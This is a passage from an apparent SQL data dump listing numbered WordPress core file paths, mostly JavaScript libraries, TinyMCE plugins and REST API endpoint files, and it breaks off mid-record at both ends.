demirror/htmlhint-kses.js'),(2963,'wp-includes/js/codemirror/htmlhint.js'),(2964,'wp-includes/js/codemirror/jsonlint.js'),(2965,'wp-includes/js/colorpicker.js'),(2966,'wp-includes/js/colorpicker.min.js'),(2967,'wp-includes/js/comment-reply.js'),(2968,'wp-includes/js/comment-reply.min.js'),(2969,'wp-includes/js/crop/cropper.css'),(2970,'wp-includes/js/crop/cropper.js'),(2971,'wp-includes/js/crop/marqueeHoriz.gif'),(2972,'wp-includes/js/crop/marqueeVert.gif'),(2973,'wp-includes/js/customize-base.js'),(2974,'wp-includes/js/customize-base.min.js'),(2975,'wp-includes/js/customize-loader.js'),(2976,'wp-includes/js/customize-loader.min.js'),(2977,'wp-includes/js/customize-models.js'),(2978,'wp-includes/js/customize-models.min.js'),(2979,'wp-includes/js/customize-preview-nav-menus.js'),(2980,'wp-includes/js/customize-preview-nav-menus.min.js'),(2981,'wp-includes/js/customize-preview-widgets.js'),(2982,'wp-includes/js/customize-preview-widgets.min.js'),(2983,'wp-includes/js/customize-preview.js'),(2984,'wp-includes/js/customize-preview.min.js'),(2985,'wp-includes/js/customize-selective-refresh.js'),(2986,'wp-includes/js/customize-selective-refresh.min.js'),(2987,'wp-includes/js/customize-views.js'),(2988,'wp-includes/js/customize-views.min.js'),(2989,'wp-includes/js/dist/a11y.js'),(2990,'wp-includes/js/dist/a11y.min.js'),(2991,'wp-includes/js/dist/annotations.js'),(2992,'wp-includes/js/dist/annotations.min.js'),(2993,'wp-includes/js/dist/api-fetch.js'),(2994,'wp-includes/js/dist/api-fetch.min.js'),(2995,'wp-includes/js/dist/autop.js'),(2996,'wp-includes/js/dist/autop.min.js'),(2997,'wp-includes/js/dist/blob.js'),(2998,'wp-includes/js/dist/blob.min.js'),(2999,'wp-includes/js/dist/block-directory.js'),(3000,'wp-includes/js/dist/block-directory.min.js'),(3001,'wp-includes/js/dist/block-editor.js'),(3002,'wp-includes/js/dist/block-editor.min.js'),(3003,'wp-includes/js/dist/block-library.js'),(3004,'wp-includes/js/dist/block-library.min.js'),(3005,'wp-includes/js/dist/block-serialization-default-parser.js'),(3006,'wp-includes/js/dist/block-serialization-default-parser.min.js'),(3007,'wp-includes/js/dist/blocks.js'),(3008,'wp-includes/js/dist/blocks.min.js'),(3009,'wp-includes/js/dist/components.js'),(3010,'wp-includes/js/dist/components.min.js'),(3011,'wp-includes/js/dist/compose.js'),(3012,'wp-includes/js/dist/compose.min.js'),(3013,'wp-includes/js/dist/core-data.js'),(3014,'wp-includes/js/dist/core-data.min.js'),(3015,'wp-includes/js/dist/customize-widgets.js'),(3016,'wp-includes/js/dist/customize-widgets.min.js'),(3017,'wp-includes/js/dist/data-controls.js'),(3018,'wp-includes/js/dist/data-controls.min.js'),(3019,'wp-includes/js/dist/data.js'),(3020,'wp-includes/js/dist/data.min.js'),(3021,'wp-includes/js/dist/date.js'),(3022,'wp-includes/js/dist/date.min.js'),(3023,'wp-includes/js/dist/deprecated.js'),(3024,'wp-includes/js/dist/deprecated.min.js'),(3025,'wp-includes/js/dist/dom-ready.js'),(3026,'wp-includes/js/dist/dom-ready.min.js'),(3027,'wp-includes/js/dist/dom.js'),(3028,'wp-includes/js/dist/dom.min.js'),(3029,'wp-includes/js/dist/edit-post.js'),(3030,'wp-includes/js/dist/edit-post.min.js'),(3031,'wp-includes/js/dist/edit-widgets.js'),(3032,'wp-includes/js/dist/edit-widgets.min.js'),(3033,'wp-includes/js/dist/editor.js'),(3034,'wp-includes/js/dist/editor.min.js'),(3035,'wp-includes/js/dist/element.js'),(3036,'wp-includes/js/dist/element.min.js'),(3037,'wp-includes/js/dist/escape-html.js'),(3038,'wp-includes/js/dist/escape-html.min.js'),(3039,'wp-includes/js/dist/format-library.js'),(3040,'wp-includes/js/dist/format-library.min.js'),(3041,'wp-includes/js/dist/hooks.js'),(3042,'wp-includes/js/dist/hooks.min.js'),(3043,'wp-includes/js/dist/html-entities.js'),(3044,'wp-includes/js/dist/html-entities.min.js'),(3045,'wp-includes/js/dist/i18n.js'),(3046,'wp-includes/js/dist/i18n.min.js'),(3047,'wp-includes/js/dist/is-shallow-equal.js'),(3048,'wp-includes/js/dist/is-shallow-equal.min.js'),(3049,'wp-includes/js/dist/keyboard-shortcuts.js'),(3050,'wp-includes/js/dist/keyboard-shortcuts.min.js'),(3051,'wp-includes/js/dist/keycodes.js'),(3052,'wp-includes/js/dist/keycodes.min.js'),(3053,'wp-includes/js/dist/list-reusable-blocks.js'),(3054,'wp-includes/js/dist/list-reusable-blocks.min.js'),(3055,'wp-includes/js/dist/media-utils.js'),(3056,'wp-includes/js/dist/media-utils.min.js'),(3057,'wp-includes/js/dist/notices.js'),(3058,'wp-includes/js/dist/notices.min.js'),(3059,'wp-includes/js/dist/nux.js'),(3060,'wp-includes/js/dist/nux.min.js'),(3061,'wp-includes/js/dist/plugins.js'),(3062,'wp-includes/js/dist/plugins.min.js'),(3063,'wp-includes/js/dist/primitives.js'),(3064,'wp-includes/js/dist/primitives.min.js'),(3065,'wp-includes/js/dist/priority-queue.js'),(3066,'wp-includes/js/dist/priority-queue.min.js'),(3067,'wp-includes/js/dist/redux-routine.js'),(3068,'wp-includes/js/dist/redux-routine.min.js'),(3069,'wp-includes/js/dist/reusable-blocks.js'),(3070,'wp-includes/js/dist/reusable-blocks.min.js'),(3071,'wp-includes/js/dist/rich-text.js'),(3072,'wp-includes/js/dist/rich-text.min.js'),(3073,'wp-includes/js/dist/server-side-render.js'),(3074,'wp-includes/js/dist/server-side-render.min.js'),(3075,'wp-includes/js/dist/shortcode.js'),(3076,'wp-includes/js/dist/shortcode.min.js'),(3077,'wp-includes/js/dist/token-list.js'),(3078,'wp-includes/js/dist/token-list.min.js'),(3079,'wp-includes/js/dist/url.js'),(3080,'wp-includes/js/dist/url.min.js'),(3081,'wp-includes/js/dist/vendor/lodash.js'),(3082,'wp-includes/js/dist/vendor/lodash.min.js'),(3083,'wp-includes/js/dist/vendor/moment.js'),(3084,'wp-includes/js/dist/vendor/moment.min.js'),(3085,'wp-includes/js/dist/vendor/react-dom.js'),(3086,'wp-includes/js/dist/vendor/react-dom.min.js'),(3087,'wp-includes/js/dist/vendor/react.js'),(3088,'wp-includes/js/dist/vendor/react.min.js'),(3089,'wp-includes/js/dist/vendor/regenerator-runtime.js'),(3090,'wp-includes/js/dist/vendor/regenerator-runtime.min.js'),(3091,'wp-includes/js/dist/vendor/wp-polyfill-dom-rect.js'),(3092,'wp-includes/js/dist/vendor/wp-polyfill-dom-rect.min.js'),(3093,'wp-includes/js/dist/vendor/wp-polyfill-element-closest.js'),(3094,'wp-includes/js/dist/vendor/wp-polyfill-element-closest.min.js'),(3095,'wp-includes/js/dist/vendor/wp-polyfill-fetch.js'),(3096,'wp-includes/js/dist/vendor/wp-polyfill-fetch.min.js'),(3097,'wp-includes/js/dist/vendor/wp-polyfill-formdata.js'),(3098,'wp-includes/js/dist/vendor/wp-polyfill-formdata.min.js'),(3099,'wp-includes/js/dist/vendor/wp-polyfill-node-contains.js'),(3100,'wp-includes/js/dist/vendor/wp-polyfill-node-contains.min.js'),(3101,'wp-includes/js/dist/vendor/wp-polyfill-object-fit.js'),(3102,'wp-includes/js/dist/vendor/wp-polyfill-object-fit.min.js'),(3103,'wp-includes/js/dist/vendor/wp-polyfill-url.js'),(3104,'wp-includes/js/dist/vendor/wp-polyfill-url.min.js'),(3105,'wp-includes/js/dist/vendor/wp-polyfill.js'),(3106,'wp-includes/js/dist/vendor/wp-polyfill.min.js'),(3107,'wp-includes/js/dist/viewport.js'),(3108,'wp-includes/js/dist/viewport.min.js'),(3109,'wp-includes/js/dist/warning.js'),(3110,'wp-includes/js/dist/warning.min.js'),(3111,'wp-includes/js/dist/widgets.js'),(3112,'wp-includes/js/dist/widgets.min.js'),(3113,'wp-includes/js/dist/wordcount.js'),(3114,'wp-includes/js/dist/wordcount.min.js'),(3115,'wp-includes/js/heartbeat.js'),(3116,'wp-includes/js/heartbeat.min.js'),(3117,'wp-includes/js/hoverIntent.js'),(3118,'wp-includes/js/hoverIntent.min.js'),(3119,'wp-includes/js/hoverintent-js.min.js'),(3120,'wp-includes/js/imagesloaded.min.js'),(3121,'wp-includes/js/imgareaselect/border-anim-h.gif'),(3122,'wp-includes/js/imgareaselect/border-anim-v.gif'),(3123,'wp-includes/js/imgareaselect/imgareaselect.css'),(3124,'wp-includes/js/imgareaselect/jquery.imgareaselect.js'),(3125,'wp-includes/js/imgareaselect/jquery.imgareaselect.min.js'),(3126,'wp-includes/js/jcrop/Jcrop.gif'),(3127,'wp-includes/js/jcrop/jquery.Jcrop.min.css'),(3128,'wp-includes/js/jcrop/jquery.Jcrop.min.js'),(3129,'wp-includes/js/jquery/jquery-migrate.js'),(3130,'wp-includes/js/jquery/jquery-migrate.min.js'),(3131,'wp-includes/js/jquery/jquery.color.min.js'),(3132,'wp-includes/js/jquery/jquery.form.js'),(3133,'wp-includes/js/jquery/jquery.form.min.js'),(3134,'wp-includes/js/jquery/jquery.hotkeys.js'),(3135,'wp-includes/js/jquery/jquery.hotkeys.min.js'),(3136,'wp-includes/js/jquery/jquery.js'),(3137,'wp-includes/js/jquery/jquery.masonry.min.js'),(3138,'wp-includes/js/jquery/jquery.min.js'),(3139,'wp-includes/js/jquery/jquery.query.js'),(3140,'wp-includes/js/jquery/jquery.schedule.js'),(3141,'wp-includes/js/jquery/jquery.serialize-object.js'),(3142,'wp-includes/js/jquery/jquery.table-hotkeys.js'),(3143,'wp-includes/js/jquery/jquery.table-hotkeys.min.js'),(3144,'wp-includes/js/jquery/jquery.ui.touch-punch.js'),(3145,'wp-includes/js/jquery/suggest.js'),(3146,'wp-includes/js/jquery/suggest.min.js'),(3147,'wp-includes/js/jquery/ui/accordion.js'),(3148,'wp-includes/js/jquery/ui/accordion.min.js'),(3149,'wp-includes/js/jquery/ui/autocomplete.js'),(3150,'wp-includes/js/jquery/ui/autocomplete.min.js'),(3151,'wp-includes/js/jquery/ui/button.js'),(3152,'wp-includes/js/jquery/ui/button.min.js'),(3153,'wp-includes/js/jquery/ui/checkboxradio.js'),(3154,'wp-includes/js/jquery/ui/checkboxradio.min.js'),(3155,'wp-includes/js/jquery/ui/controlgroup.js'),(3156,'wp-includes/js/jquery/ui/controlgroup.min.js'),(3157,'wp-includes/js/jquery/ui/core.js'),(3158,'wp-includes/js/jquery/ui/core.min.js'),(3159,'wp-includes/js/jquery/ui/datepicker.js'),(3160,'wp-includes/js/jquery/ui/datepicker.min.js'),(3161,'wp-includes/js/jquery/ui/dialog.js'),(3162,'wp-includes/js/jquery/ui/dialog.min.js'),(3163,'wp-includes/js/jquery/ui/draggable.js'),(3164,'wp-includes/js/jquery/ui/draggable.min.js'),(3165,'wp-includes/js/jquery/ui/droppable.js'),(3166,'wp-includes/js/jquery/ui/droppable.min.js'),(3167,'wp-includes/js/jquery/ui/effect-blind.js'),(3168,'wp-includes/js/jquery/ui/effect-blind.min.js'),(3169,'wp-includes/js/jquery/ui/effect-bounce.js'),(3170,'wp-includes/js/jquery/ui/effect-bounce.min.js'),(3171,'wp-includes/js/jquery/ui/effect-clip.js'),(3172,'wp-includes/js/jquery/ui/effect-clip.min.js'),(3173,'wp-includes/js/jquery/ui/effect-drop.js'),(3174,'wp-includes/js/jquery/ui/effect-drop.min.js'),(3175,'wp-includes/js/jquery/ui/effect-explode.js'),(3176,'wp-includes/js/jquery/ui/effect-explode.min.js'),(3177,'wp-includes/js/jquery/ui/effect-fade.js'),(3178,'wp-includes/js/jquery/ui/effect-fade.min.js'),(3179,'wp-includes/js/jquery/ui/effect-fold.js'),(3180,'wp-includes/js/jquery/ui/effect-fold.min.js'),(3181,'wp-includes/js/jquery/ui/effect-highlight.js'),(3182,'wp-includes/js/jquery/ui/effect-highlight.min.js'),(3183,'wp-includes/js/jquery/ui/effect-puff.js'),(3184,'wp-includes/js/jquery/ui/effect-puff.min.js'),(3185,'wp-includes/js/jquery/ui/effect-pulsate.js'),(3186,'wp-includes/js/jquery/ui/effect-pulsate.min.js'),(3187,'wp-includes/js/jquery/ui/effect-scale.js'),(3188,'wp-includes/js/jquery/ui/effect-scale.min.js'),(3189,'wp-includes/js/jquery/ui/effect-shake.js'),(3190,'wp-includes/js/jquery/ui/effect-shake.min.js'),(3191,'wp-includes/js/jquery/ui/effect-size.js'),(3192,'wp-includes/js/jquery/ui/effect-size.min.js'),(3193,'wp-includes/js/jquery/ui/effect-slide.js'),(3194,'wp-includes/js/jquery/ui/effect-slide.min.js'),(3195,'wp-includes/js/jquery/ui/effect-transfer.js'),(3196,'wp-includes/js/jquery/ui/effect-transfer.min.js'),(3197,'wp-includes/js/jquery/ui/effect.js'),(3198,'wp-includes/js/jquery/ui/effect.min.js'),(3199,'wp-includes/js/jquery/ui/menu.js'),(3200,'wp-includes/js/jquery/ui/menu.min.js'),(3201,'wp-includes/js/jquery/ui/mouse.js'),(3202,'wp-includes/js/jquery/ui/mouse.min.js'),(3203,'wp-includes/js/jquery/ui/progressbar.js'),(3204,'wp-includes/js/jquery/ui/progressbar.min.js'),(3205,'wp-includes/js/jquery/ui/resizable.js'),(3206,'wp-includes/js/jquery/ui/resizable.min.js'),(3207,'wp-includes/js/jquery/ui/selectable.js'),(3208,'wp-includes/js/jquery/ui/selectable.min.js'),(3209,'wp-includes/js/jquery/ui/selectmenu.js'),(3210,'wp-includes/js/jquery/ui/selectmenu.min.js'),(3211,'wp-includes/js/jquery/ui/slider.js'),(3212,'wp-includes/js/jquery/ui/slider.min.js'),(3213,'wp-includes/js/jquery/ui/sortable.js'),(3214,'wp-includes/js/jquery/ui/sortable.min.js'),(3215,'wp-includes/js/jquery/ui/spinner.js'),(3216,'wp-includes/js/jquery/ui/spinner.min.js'),(3217,'wp-includes/js/jquery/ui/tabs.js'),(3218,'wp-includes/js/jquery/ui/tabs.min.js'),(3219,'wp-includes/js/jquery/ui/tooltip.js'),(3220,'wp-includes/js/jquery/ui/tooltip.min.js'),(3221,'wp-includes/js/json2.js'),(3222,'wp-includes/js/json2.min.js'),(3223,'wp-includes/js/masonry.min.js'),(3224,'wp-includes/js/mce-view.js'),(3225,'wp-includes/js/mce-view.min.js'),(3226,'wp-includes/js/media-audiovideo.js'),(3227,'wp-includes/js/media-audiovideo.min.js'),(3228,'wp-includes/js/media-editor.js'),(3229,'wp-includes/js/media-editor.min.js'),(3230,'wp-includes/js/media-grid.js'),(3231,'wp-includes/js/media-grid.min.js'),(3232,'wp-includes/js/media-models.js'),(3233,'wp-includes/js/media-models.min.js'),(3234,'wp-includes/js/media-views.js'),(3235,'wp-includes/js/media-views.min.js'),(3236,'wp-includes/js/mediaelement/mediaelement-and-player.js'),(3237,'wp-includes/js/mediaelement/mediaelement-and-player.min.js'),(3238,'wp-includes/js/mediaelement/mediaelement-migrate.js'),(3239,'wp-includes/js/mediaelement/mediaelement-migrate.min.js'),(3240,'wp-includes/js/mediaelement/mediaelement.js'),(3241,'wp-includes/js/mediaelement/mediaelement.min.js'),(3242,'wp-includes/js/mediaelement/mediaelementplayer-legacy.css'),(3243,'wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css'),(3244,'wp-includes/js/mediaelement/mediaelementplayer.css'),(3245,'wp-includes/js/mediaelement/mediaelementplayer.min.css'),(3246,'wp-includes/js/mediaelement/mejs-controls.png'),(3247,'wp-includes/js/mediaelement/mejs-controls.svg'),(3248,'wp-includes/js/mediaelement/renderers/vimeo.js'),(3249,'wp-includes/js/mediaelement/renderers/vimeo.min.js'),(3250,'wp-includes/js/mediaelement/wp-mediaelement.css'),(3251,'wp-includes/js/mediaelement/wp-mediaelement.js'),(3252,'wp-includes/js/mediaelement/wp-mediaelement.min.css'),(3253,'wp-includes/js/mediaelement/wp-mediaelement.min.js'),(3254,'wp-includes/js/mediaelement/wp-playlist.js'),(3255,'wp-includes/js/mediaelement/wp-playlist.min.js'),(3256,'wp-includes/js/plupload/handlers.js'),(3257,'wp-includes/js/plupload/handlers.min.js'),(3258,'wp-includes/js/plupload/license.txt'),(3259,'wp-includes/js/plupload/moxie.js'),(3260,'wp-includes/js/plupload/moxie.min.js'),(3261,'wp-includes/js/plupload/plupload.js'),(3262,'wp-includes/js/plupload/plupload.min.js'),(3263,'wp-includes/js/plupload/wp-plupload.js'),(3264,'wp-includes/js/plupload/wp-plupload.min.js'),(3265,'wp-includes/js/quicktags.js'),(3266,'wp-includes/js/quicktags.min.js'),(3267,'wp-includes/js/shortcode.js'),(3268,'wp-includes/js/shortcode.min.js'),(3269,'wp-includes/js/swfobject.js'),(3270,'wp-includes/js/swfupload/handlers.js'),(3271,'wp-includes/js/swfupload/handlers.min.js'),(3272,'wp-includes/js/swfupload/license.txt'),(3273,'wp-includes/js/swfupload/swfupload.js'),(3274,'wp-includes/js/thickbox/loadingAnimation.gif'),(3275,'wp-includes/js/thickbox/macFFBgHack.png'),(3276,'wp-includes/js/thickbox/thickbox.css'),(3277,'wp-includes/js/thickbox/thickbox.js'),(3278,'wp-includes/js/tinymce/langs/wp-langs-en.js'),(3279,'wp-includes/js/tinymce/license.txt'),(3280,'wp-includes/js/tinymce/plugins/charmap/plugin.js'),(3281,'wp-includes/js/tinymce/plugins/charmap/plugin.min.js'),(3282,'wp-includes/js/tinymce/plugins/colorpicker/plugin.js'),(3283,'wp-includes/js/tinymce/plugins/colorpicker/plugin.min.js'),(3284,'wp-includes/js/tinymce/plugins/compat3x/css/dialog.css'),(3285,'wp-includes/js/tinymce/plugins/compat3x/plugin.js'),(3286,'wp-includes/js/tinymce/plugins/compat3x/plugin.min.js'),(3287,'wp-includes/js/tinymce/plugins/directionality/plugin.js'),(3288,'wp-includes/js/tinymce/plugins/directionality/plugin.min.js'),(3289,'wp-includes/js/tinymce/plugins/fullscreen/plugin.js'),(3290,'wp-includes/js/tinymce/plugins/fullscreen/plugin.min.js'),(3291,'wp-includes/js/tinymce/plugins/hr/plugin.js'),(3292,'wp-includes/js/tinymce/plugins/hr/plugin.min.js'),(3293,'wp-includes/js/tinymce/plugins/image/plugin.js'),(3294,'wp-includes/js/tinymce/plugins/image/plugin.min.js'),(3295,'wp-includes/js/tinymce/plugins/link/plugin.js'),(3296,'wp-includes/js/tinymce/plugins/link/plugin.min.js'),(3297,'wp-includes/js/tinymce/plugins/lists/plugin.js'),(3298,'wp-includes/js/tinymce/plugins/lists/plugin.min.js'),(3299,'wp-includes/js/tinymce/plugins/media/plugin.js'),(3300,'wp-includes/js/tinymce/plugins/media/plugin.min.js'),(3301,'wp-includes/js/tinymce/plugins/paste/plugin.js'),(3302,'wp-includes/js/tinymce/plugins/paste/plugin.min.js'),(3303,'wp-includes/js/tinymce/plugins/tabfocus/plugin.js'),(3304,'wp-includes/js/tinymce/plugins/tabfocus/plugin.min.js'),(3305,'wp-includes/js/tinymce/plugins/textcolor/plugin.js'),(3306,'wp-includes/js/tinymce/plugins/textcolor/plugin.min.js'),(3307,'wp-includes/js/tinymce/plugins/wordpress/plugin.js'),(3308,'wp-includes/js/tinymce/plugins/wordpress/plugin.min.js'),(3309,'wp-includes/js/tinymce/plugins/wpautoresize/plugin.js'),(3310,'wp-includes/js/tinymce/plugins/wpautoresize/plugin.min.js'),(3311,'wp-includes/js/tinymce/plugins/wpdialogs/plugin.js'),(3312,'wp-includes/js/tinymce/plugins/wpdialogs/plugin.min.js'),(3313,'wp-includes/js/tinymce/plugins/wpeditimage/plugin.js'),(3314,'wp-includes/js/tinymce/plugins/wpeditimage/plugin.min.js'),(3315,'wp-includes/js/tinymce/plugins/wpemoji/plugin.js'),(3316,'wp-includes/js/tinymce/plugins/wpemoji/plugin.min.js'),(3317,'wp-includes/js/tinymce/plugins/wpgallery/plugin.js'),(3318,'wp-includes/js/tinymce/plugins/wpgallery/plugin.min.js'),(3319,'wp-includes/js/tinymce/plugins/wplink/plugin.js'),(3320,'wp-includes/js/tinymce/plugins/wplink/plugin.min.js'),(3321,'wp-includes/js/tinymce/plugins/wptextpattern/plugin.js'),(3322,'wp-includes/js/tinymce/plugins/wptextpattern/plugin.min.js'),(3323,'wp-includes/js/tinymce/plugins/wpview/plugin.js'),(3324,'wp-includes/js/tinymce/plugins/wpview/plugin.min.js'),(3325,'wp-includes/js/tinymce/skins/lightgray/content.inline.min.css'),(3326,'wp-includes/js/tinymce/skins/lightgray/content.min.css'),(3327,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.eot'),(3328,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.svg'),(3329,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.ttf'),(3330,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.woff'),(3331,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.eot'),(3332,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.svg'),(3333,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.ttf'),(3334,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.woff'),(3335,'wp-includes/js/tinymce/skins/lightgray/img/anchor.gif'),(3336,'wp-includes/js/tinymce/skins/lightgray/img/loader.gif'),(3337,'wp-includes/js/tinymce/skins/lightgray/img/object.gif'),(3338,'wp-includes/js/tinymce/skins/lightgray/img/trans.gif'),(3339,'wp-includes/js/tinymce/skins/lightgray/skin.min.css'),(3340,'wp-includes/js/tinymce/skins/wordpress/images/audio.png'),(3341,'wp-includes/js/tinymce/skins/wordpress/images/dashicon-edit.png'),(3342,'wp-includes/js/tinymce/skins/wordpress/images/dashicon-no.png'),(3343,'wp-includes/js/tinymce/skins/wordpress/images/embedded.png'),(3344,'wp-includes/js/tinymce/skins/wordpress/images/gallery-2x.png'),(3345,'wp-includes/js/tinymce/skins/wordpress/images/gallery.png'),(3346,'wp-includes/js/tinymce/skins/wordpress/images/more-2x.png'),(3347,'wp-includes/js/tinymce/skins/wordpress/images/more.png'),(3348,'wp-includes/js/tinymce/skins/wordpress/images/pagebreak-2x.png'),(3349,'wp-includes/js/tinymce/skins/wordpress/images/pagebreak.png'),(3350,'wp-includes/js/tinymce/skins/wordpress/images/playlist-audio.png'),(3351,'wp-includes/js/tinymce/skins/wordpress/images/playlist-video.png'),(3352,'wp-includes/js/tinymce/skins/wordpress/images/video.png'),(3353,'wp-includes/js/tinymce/skins/wordpress/wp-content.css'),(3354,'wp-includes/js/tinymce/themes/inlite/theme.js'),(3355,'wp-includes/js/tinymce/themes/inlite/theme.min.js'),(3356,'wp-includes/js/tinymce/themes/modern/theme.js'),(3357,'wp-includes/js/tinymce/themes/modern/theme.min.js'),(3358,'wp-includes/js/tinymce/tiny_mce_popup.js'),(3359,'wp-includes/js/tinymce/tinymce.min.js'),(3360,'wp-includes/js/tinymce/utils/editable_selects.js'),(3361,'wp-includes/js/tinymce/utils/form_utils.js'),(3362,'wp-includes/js/tinymce/utils/mctabs.js'),(3363,'wp-includes/js/tinymce/utils/validate.js'),(3364,'wp-includes/js/tinymce/wp-tinymce.js'),(3365,'wp-includes/js/tinymce/wp-tinymce.php'),(3366,'wp-includes/js/tw-sack.js'),(3367,'wp-includes/js/tw-sack.min.js'),(3368,'wp-includes/js/twemoji.js'),(3369,'wp-includes/js/twemoji.min.js'),(3370,'wp-includes/js/underscore.js'),(3371,'wp-includes/js/underscore.min.js'),(3372,'wp-includes/js/utils.js'),(3373,'wp-includes/js/utils.min.js'),(3374,'wp-includes/js/wp-ajax-response.js'),(3375,'wp-includes/js/wp-ajax-response.min.js'),(3376,'wp-includes/js/wp-api.js'),(3377,'wp-includes/js/wp-api.min.js'),(3378,'wp-includes/js/wp-auth-check.js'),(3379,'wp-includes/js/wp-auth-check.min.js'),(3380,'wp-includes/js/wp-backbone.js'),(3381,'wp-includes/js/wp-backbone.min.js'),(3382,'wp-includes/js/wp-custom-header.js'),(3383,'wp-includes/js/wp-custom-header.min.js'),(3384,'wp-includes/js/wp-embed-template.js'),(3385,'wp-includes/js/wp-embed-template.min.js'),(3386,'wp-includes/js/wp-embed.js'),(3387,'wp-includes/js/wp-embed.min.js'),(3388,'wp-includes/js/wp-emoji-loader.js'),(3389,'wp-includes/js/wp-emoji-loader.min.js'),(3390,'wp-includes/js/wp-emoji-release.min.js'),(3391,'wp-includes/js/wp-emoji.js'),(3392,'wp-includes/js/wp-emoji.min.js'),(3393,'wp-includes/js/wp-list-revisions.js'),(3394,'wp-includes/js/wp-list-revisions.min.js'),(3395,'wp-includes/js/wp-lists.js'),(3396,'wp-includes/js/wp-lists.min.js'),(3397,'wp-includes/js/wp-pointer.js'),(3398,'wp-includes/js/wp-pointer.min.js'),(3399,'wp-includes/js/wp-sanitize.js'),(3400,'wp-includes/js/wp-sanitize.min.js'),(3401,'wp-includes/js/wp-util.js'),(3402,'wp-includes/js/wp-util.min.js'),(3403,'wp-includes/js/wpdialog.js'),(3404,'wp-includes/js/wpdialog.min.js'),(3405,'wp-includes/js/wplink.js'),(3406,'wp-includes/js/wplink.min.js'),(3407,'wp-includes/js/zxcvbn-async.js'),(3408,'wp-includes/js/zxcvbn-async.min.js'),(3409,'wp-includes/js/zxcvbn.min.js'),(3410,'wp-includes/kses.php'),(3411,'wp-includes/l10n.php'),(3412,'wp-includes/link-template.php'),(3413,'wp-includes/load.php'),(3414,'wp-includes/locale.php'),(3415,'wp-includes/media-template.php'),(3416,'wp-includes/media.php'),(3417,'wp-includes/meta.php'),(3418,'wp-includes/ms-blogs.php'),(3419,'wp-includes/ms-default-constants.php'),(3420,'wp-includes/ms-default-filters.php'),(3421,'wp-includes/ms-deprecated.php'),(3422,'wp-includes/ms-files.php'),(3423,'wp-includes/ms-functions.php'),(3424,'wp-includes/ms-load.php'),(3425,'wp-includes/ms-network.php'),(3426,'wp-includes/ms-settings.php'),(3427,'wp-includes/ms-site.php'),(3428,'wp-includes/nav-menu-template.php'),(3429,'wp-includes/nav-menu.php'),(3430,'wp-includes/option.php'),(3431,'wp-includes/pluggable-deprecated.php'),(3432,'wp-includes/pluggable.php'),(3433,'wp-includes/plugin.php'),(3434,'wp-includes/pomo/entry.php'),(3435,'wp-includes/pomo/mo.php'),(3436,'wp-includes/pomo/plural-forms.php'),(3437,'wp-includes/pomo/po.php'),(3438,'wp-includes/pomo/streams.php'),(3439,'wp-includes/pomo/translations.php'),(3440,'wp-includes/post-formats.php'),(3441,'wp-includes/post-template.php'),(3442,'wp-includes/post-thumbnail-template.php'),(3443,'wp-includes/post.php'),(3444,'wp-includes/query.php'),(3445,'wp-includes/random_compat/byte_safe_strings.php'),(3446,'wp-includes/random_compat/cast_to_int.php'),(3447,'wp-includes/random_compat/error_polyfill.php'),(3448,'wp-includes/random_compat/random.php'),(3449,'wp-includes/random_compat/random_bytes_com_dotnet.php'),(3450,'wp-includes/random_compat/random_bytes_dev_urandom.php'),(3451,'wp-includes/random_compat/random_bytes_libsodium.php'),(3452,'wp-includes/random_compat/random_bytes_libsodium_legacy.php'),(3453,'wp-includes/random_compat/random_bytes_mcrypt.php'),(3454,'wp-includes/random_compat/random_int.php'),(3455,'wp-includes/registration-functions.php'),(3456,'wp-includes/registration.php'),(3457,'wp-includes/rest-api/class-wp-rest-request.php'),(3458,'wp-includes/rest-api/class-wp-rest-response.php'),(3459,'wp-includes/rest-api/class-wp-rest-server.php'),(3460,'wp-includes/rest-api/endpoints/class-wp-rest-application-passwords-controller.php'),(3461,'wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php'),(3462,'wp-includes/rest-api/endpoints/class-wp-rest-autosaves-controller.php'),(3463,'wp-includes/rest-api/endpoints/class-wp-rest-block-directory-controller.php'),(3464,'wp-includes/rest-api/endpoints/class-wp-rest-block-renderer-controller.php'),(3465,'wp-includes/rest-api/endpoints/class-wp-rest-block-types-controller.php'),(3466,'wp-includes/rest-api/endpoints/class-wp-rest-blocks-controller.php'),(3467,'wp-includes/rest-api/endpoints/class-wp-rest-comments-controller.php'),(3468,'wp-includes/rest-api/endpoints/class-wp-rest-controller.php'),(3469,'wp-includes/rest-api/endpoints/class-wp-rest-pattern-directory-controller.php'),(3470,'wp-includes/rest-api/endpoints/class-wp-rest-plugins-controller.php'),(3471,'wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php'),(3472,'wp-includes/rest-api/endpoints/class-wp-rest-post-types-controller.php'),(3473,'wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php'),(3474,'wp-includes/rest-api/endpoints/class-wp-rest-revisions-controller.php'),(3475,'wp-includes/rest-api/endpoints/class-wp-rest-search-controller.php'),(3476,'wp-includes/rest-api/endpoints/class-wp-rest-settings-controller.php'),(3477,'wp-includes/rest-api/endpoints/class-wp-rest-sidebars-controller.php'),(3478,'wp-includes/rest-api/endpoints/class-wp-rest-site-health-controller.php'),(3479,'wp-includes/rest-api/endpoints/class-wp-rest-taxonomies-controller.php'),(3480,'wp-includes/rest-api/endpoints/class-wp-rest-templates-controller.php'),(3481,'wp-includes/rest-api/endpoints/class-wp-rest-terms-controller.php'),(3482,'wp-includes/rest-api/endpoints/class-wp-rest-themes-controller.php'),(3483,'wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php'),(3484,'wp-includes/rest-api/endpoints/class-wp-rest-widget-types-controller.php'),(3485,'wp-includes/rest-api/endpoints/class-wp-rest-widgets-controller.php'),(3486,'wp-includes/rest-api/fields/class-wp-rest-comment-meta-fields.php'),(3487,'wp-includes/rest-api/fields/class-wp-rest-meta-fields.php'),(3488,'wp-includes/rest-api/fields/class-wp-rest-post-meta-fields.php'),(3489,'wp-includes/rest-api/fields/class-wp-rest-term-meta-fields.php'),(3490,'wp-includes/rest-api/fields/class-wp-rest-user-meta-fields.php'),(3491,'wp-includes/rest-api/search/class-wp-rest-post-format-search-handler.php'),(